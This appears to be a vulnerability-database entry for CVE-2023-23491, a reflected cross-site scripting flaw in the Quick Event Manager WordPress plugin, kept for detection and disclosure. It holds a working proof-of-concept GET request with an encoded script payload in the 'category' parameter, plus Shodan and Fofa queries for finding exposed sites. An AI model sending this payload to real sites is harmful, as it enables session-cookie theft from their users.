🔙 목록으로 돌아가기

CVE-2023-23491: Quick Event Manager < 9.7.5 - Cross-Site Scripting

TitleQuick Event Manager < 9.7.5 - Cross-Site Scripting
Authorritikchaddha
SeverityMedium
ImpactUnauthenticated attackers can inject malicious JavaScript through the category parameter in the qem_ajax_calendar action to steal WordPress user session cookies and execute attacks.
RemediationFixed in version 9.7.5 and above
CVSS Score6.1
EPSS Score0.07588
CVE IDCVE-2023-23491
CWE IDCWE-79
Shodan Queryhttp.html:/wp-content/plugins/quick-event-manager
Fofa Querybody=/wp-content/plugins/quick-event-manager
Tags cve2023 cve wordpress wp wp-plugin wpscan xss quick-event-manager fullworksplugins vuln

🔍 Vulnerability Description

The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the ‘category’ parameter of its ‘qem_ajax_calendar’ action.

🌐 HTTP Request

GET /wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Version/8.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23491.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-23491.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A